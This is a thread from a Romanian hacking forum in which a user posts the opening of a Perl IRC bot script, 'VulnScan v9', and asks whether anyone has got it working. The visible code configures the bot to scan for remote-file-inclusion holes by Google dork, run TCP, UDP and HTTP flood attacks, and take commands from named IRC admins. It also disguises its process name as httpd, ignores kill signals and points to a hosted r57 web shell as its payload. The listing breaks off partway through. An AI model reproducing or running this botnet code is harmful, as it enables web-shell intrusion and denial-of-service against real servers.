Hacking and more...
HaCkinG CulT
|
Lista Forumurilor Pe Tematici
|
Hacking and more... | Reguli | Inregistrare | Login
POZE HACKING AND MORE...
Nu sunteti logat.
|
Nou pe simpatie: Nebunyka 21 ani
 | Femeie 21 ani Bacau cauta Barbat 21 - 52 ani |
|
clawmvp
Senior
 Inregistrat: acum 17 ani
Postari: 110
|
|
stie cineva ceva despre asa ceva?
mhm nu pot sa mai modific al 2`lea post ... so.. cine`l testeaza sa posteze si rezultatele(daca a mers sau nu) pentru ca eu n`am reusit sa`l fac sa mearga (dar sunt slab recunosc)
Modificat de clawmvp (acum 17 ani)
|
|
pus acum 17 ani |
|
RockWilder
Elite Member
 Din: Real World!
Inregistrat: acum 18 ani
Postari: 894
|
|
La ce te referi? Spune-ne mai pe larg ce vrei sa zici poate te putem ajuta!
_______________________________________ Only those who attempt the absurd will achieve the impossible. (M C Escher)
|
|
pus acum 17 ani |
|
clawmvp
Senior
 Inregistrat: acum 17 ani
Postari: 110
|
|
un bot de irc care scaneaza dupa vulnerabilitati rfi
ceva de genu`
Code:
#!/usr/bin/perl
# VulnScan v9 edited by PcWoRm ( this is Morgan v8 with some changes )
#
# U can see and test it in channel: #AOD
#
# Note:
# Do what u wana,there is no copyrights =)
#
# New functions :
# New l33t colors
# Fixed Google
#
# command :
# !cmd !eval vat='google%20dork';
# !cmd @scan <time> <string> <google-dork> "mod by PescaoDeth"
# !cmd @tcp <ip> <bytes> <time>
# !cmd @udp <ip> <bytes> <time>
# !cmd @httpflood <ip> porta <bytes> <time>
# !cmd !ircomando var
# Greets to :
#
# All +ao #morgan members in irc.gigachat.net
# who cenzurat the channel =)
# otros cambios by PescaoDeth www.yashira.org nick aleatorio de un array
use HTTP::Request;
use LWP::UserAgent;
my @listanick=(
"[HackZip]"
);
################ V9 CONFIGURATION #############################################################
my $processo = '/usr/sbin/httpd'; # Fake process name for the bot #
#if (`ps uxw` =~ /HackZip/) # (CHANGE IT!!!) #
#{ # #
#exit; # #
#}
# #
###############################################################################################
my $linas_max='8'; # Avoid Flood #
###############################################################################################
my $sleep='5'; # sleep time #
##################### IRC #####################################################################
my @adms=("PescaoDeth","garcez","hackzip"); # Administrator Nickname #
###############################################################################################
my @canais=("#hackzip-coll :n43854b5"); # Channel ..if password -> ("#channel :pass") #
###############################################################################################
my $nick=$listanick[int(rand(scalar(@listanick)))]; # Nick prefix of the bot example : #
# vs[v7] = vs[v7]-718727 #
###############################################################################################
my $ircname = 'HackZip'; # Identd of the bot #
###############################################################################################
chop (my $realname = 'HackZip'); # Full Name #
###############################################################################################
$servidor='ircchat.terra.cl' unless $servidor; # Server IRC of the bot #
###############################################################################################
my $porta='7000'; # Server PORT #
################ CMD ##########################################################################
my @cmdgif='http://usuarios.lycos.es/yashirahackersteam/War/r57shell1.31.txt';#
# If you change this cmd must be same as: #
# # http://myspace.si/images/sad.gif #
###############################################################################################
my $VERSAO = 'v9';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"." |
| |